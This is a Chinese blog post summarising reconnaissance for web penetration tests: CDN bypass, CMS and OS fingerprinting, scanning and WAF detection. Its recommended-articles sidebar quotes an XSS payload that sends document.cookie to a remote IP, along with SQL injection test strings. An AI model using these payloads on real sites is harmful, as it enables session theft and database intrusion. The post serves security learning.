初步信息收集小总结

最新推荐文章于 2022-12-09 22:47:34 发布
最新推荐文章于 2022-12-09 22:47:34 发布
阅读量103 收藏
点赞数
分类专栏: web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Destiny_one/article/details/117261632
版权

一.查看是否有cdn
可以先进行多地ping查看是否有cdn,如果返回多个ip则很有可能拥有cdn,此时就需要绕过cdn查看目标站点的真实ip地址
绕过方法:
1.通过子域名入手
2.利用网站漏洞,例如phpinfo敏感信息泄露
3.历史DNS记录
4.邮件服务入手
5.国外请求
6.查询https证书
7. 。。。还有很多大家可以上网一一试试
还有一个问题就是如果绕过cdn以后,那么你怎么确认你获得的ip是真实的ip呢?
可以在本地的host文件当中对域名进行绑定ip,cdn的ip是访问不到的
二.查看是否开源cms:
1.插件例如wappalyzer
2.在线cms识别网站
3.网页源码
4.robots.txt文件识别
5.网站底部版权信息进行查询
三.操作系统,搭建平台和数据库类型
可以用linux区分大小写,windows则不区分大小写的特性识别操作系统
用扫描工具,例如nmap等扫描工具对目标进行扫描获取更详细的信息
四.收集站点搭建信息
用burp,御剑等目录扫描工具对目标站点进行目录扫描
端口信息则是使用nmap等工具进行探测
子域名可以使用layer挖掘机和三大引擎进行查找
旁注和c段可以使用相应的工具进行查找
五.waf信息
1.工具识别 例如:wafw00f,sqlmap,nmap

鸣蜩十四
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
深度学习知识点全面总结
专注大数据与人工智能技术分享,欢迎私信加群互相学习!
01-05 24万+
本文详细介绍深度学习概念及原理,参考网上相关资料汇总,内容包含众多章节,包括神经网络基础及常见深度学习网络结构介绍,用于个人学习总结,适合深度学习初学者学习。同时介绍机器学习常见的分类算法:SVM、神经网络、随机森林、逻辑回归、KNN、贝叶斯。常见的监督学习算法:感知机、SVM、人工神经网络、决策树、逻辑回归.........
知识图谱综述(初步了解后的总结整理)
陌若安生的博客
01-01 4955
文章目录一、导读二、知识图谱的概念演化三、 什么是知识图谱四、知识图谱的数据类型和存储方式五、知识图谱的架构六、知识图谱的构建技术七、 知识图谱的应用八、总结 注:首先声明,本篇博客是博主在查询知识图谱的资料的时候,看了数篇知识图谱综述以及阅读了相关资料后的一个总结以及自己的相关理解,仅是为了记录学习的过程。如果有侵权,请第一时间联系博主。博主是一位刚接触知识图谱的小白,初学乍练,希望可以每天进步...
环境搭建介绍
diyx22599的博客
02-10 1221
环境搭建介绍 1.环境搭建四个部分:操作系统+数据库+开发语言+服务器 操作系统:xp,win7,win8,vista,linux,unix,ios,android,mac。。。 供服务器使用:windows server 2000、windows server 2003、server2008、server2012、server2016 供个人使用:dos、windows3.1、...
信息收集 初步总结
Rita_Q的博客
12-16 4396
1.敏感信息收集 1. 1Web源代码泄露 通过工具暴破相关Web源代码泄露,流程如下: https://sec.xiaomi.com/article/37 全自动监控 github 信息泄露收集可能会用到如下地址: 网盘搜索:http://www.pansou.com/或https://www.lingfengyun.com/ 网盘密码破解可参考:https://www.52pojie.cn/thread-763130-1-1.html 社工信息泄露:https://www.instantcheck
信息搜集方法总结
seek_2022的博客
12-09 3603
对常用的信息搜集方法做了一个简单的总结
信息系统安全 总结提纲
鸭梨儿的博客
12-29 4056
信息系统安全期末复习信息系统概论什么是信息系统信息系统安全与信息安全的区别信息系统的例子信息系统发展趋势信息系统的架构边缘计算和云计算互相协同如何解决秒杀技术瓶颈为什么存在架构的复杂性问题如何度量信息系统的复杂度信息系统安全概述信息系统安全威胁,常见的威胁信息系统安全的概念信息系统安全的实质基于信息保障的信息系统安全概念信息系统脆弱性的表现Analog Attack 的基本思想攻防不对称性拟态主动防御5G 对信息系统安全带来的挑战CMM框架云计算安全架构安全需求及安全策略安全需求,一般化的安全需求访问控制策
微信小程序开发的学习资料收集
热门推荐
zhan9le的博客
06-28 1万+
小程序开发学习资料集合
基于微信电影播放小程序系统设计与实现 开题报告
杭州.黄老师
11-21 2417
基于微信电影播放小程序系统设计与实现 开题报告
BugKu-CTF(web篇)---社工-初步收集
Nailaoyyds的博客
03-07 1136
思路: 第一个思路就是先扫子目录,寻找出有效的敏感文件。 扫完子目录以后也没有什么有效信息,纯粹浪费时间, 发现有一个登陆框,各种手段爆破不出来,这时候就要换思路了 首页有下载链接,下载一下 是一个小插件 用wireshark抓包分析一下,在流量里边获取用户名和密码以及一个邮箱 密码后边两个等号==,一眼就知道是base64,去做解密 XSLROCPMNWWZQDZL 邮箱+用户+密码 提示很明显了 去试下邮箱登录 也不对。邮箱登录的方式,主流...
图像采集调试总结
kpsuwen的博客
01-01 1953
这几天在调试图像采集和图像压缩的程序,遇到一些问题,暂时记录一下! 1、图像采集的基本流程是:FPGA通过CameraLink得到相机输出的RAW data,在DDR3在做个缓存,最后通过UDP协议从千兆网口输出至上位机。整个处理流程没有对数据做算法方面的处理,程序结构上比较简单。程序调试过程中遇到的问题也不是很多,主要为跨时钟域的信号和数据的处理,还有数据存取时序的问题,开始调试因为这
小学生信息素养培养总结.pdf
10-13
通过激发学生兴趣、适当示范、引导学生自主学习和注意方法指导,可以使小学生逐步学会信息处理的具体方法,包括收集信息、加工信息、储存信息、传递信息,运用信息的各种方法解决实际问题,并具有良好的信息道德和...
医院信息系统总结版.pdf
最新发布
05-04
"医院信息系统总结版.pdf" 医院信息系统是现代化医院运行必备的基础技术环境,涵盖了公共卫生和医疗服务两个领域。医疗服务信息化是以患者信息为中心的信息化,其内容包括病人症状、检查结果、医生诊断和治疗计划等...
通用互联网信息采集系统的设计与初步实现.docx
11-06
《通用互联网信息采集系统的设计与初步实现》 互联网信息采集系统是针对网络上信息的多元化、分散性和快速变化特性而设计的一种工具。它不仅需要处理海量信息,还要能够有效地筛选、抽取、归档和分类这些信息,以便...
人工智能初步-信息技术选修-教学建议67.pptx
09-21
《人工智能初步》是一门信息技术选修课程,旨在引导学生初步理解和探索人工智能的奥秘。课程设计注重实践操作,让学生在亲身体验中感知人工智能与人类智能的异同,从而建立起对这一领域的基本认识。 课程首先从初识...
2021小学生个人学习总结.docx
10-27
6. **写作提升**:针对写作能力的提升,作者采取了积累好词好句的方法,通过整理收集本并在写作中运用,逐渐提高了作文的质量,减少了错别字。 总结起来,这份学习总结展现了作者在学习态度、学习策略、个人成长...
xss的cookie窃取原理
鸣蜩十四的博客
08-09 1393
原理:我们可以在有xss漏洞的网站插入跳入我们网站的xss代码,使用户触发漏洞的时候将cookie传入进来,我们进行接收 具体实现: 攻击代码:<script>document.write('<img src="http://1.117.107.31/getcookie.php?cookie='+document.cookie+'" width=0 height=0 border=0 />');</script> 远程接收代码: <?php $c...
sql注入-整型与字符型
鸣蜩十四的博客
11-19 1378
1、数字型注入 当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。 测试步骤: (1) 加单引号,www.aaa.com/a.php?id=1’ 对应的sql:select * from table where id=1’ 这时sql语句出错,程序无法正常从数据库中查询出数据,就会抛出异常; (2)1=1返回正确 加and 1=1 ,www.aaa.com/a.php?id=1’and...
SQL注入(思维导图)
鸣蜩十四的博客
05-27 762
sql-lib 1-10关
鸣蜩十四的博客
06-14 659
1. 字符型 http://127.0.0.1:88/sql/Less-1/?id=1' order by 4%23失败 http://127.0.0.1:88/sql/Less-1/?id=1' order by 3%23成功 http://127.0.0.1:88/sql/Less-1/?id=-1' union select 1,database(),group_concat(schema_name) from information_schema.schemata%23 查看所有数据库 ht...
渗透测试深度解析:信息搜集与权限掌控
在进行渗透测试前,收集目标系统的信息至关重要,包括但不限于目标资产的类型、网络拓扑、操作系统版本、开放的服务和端口等。这些信息的详细程度直接影响到渗透的策略和方法。例如,在案例中,通过扫描主机A1的开放...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值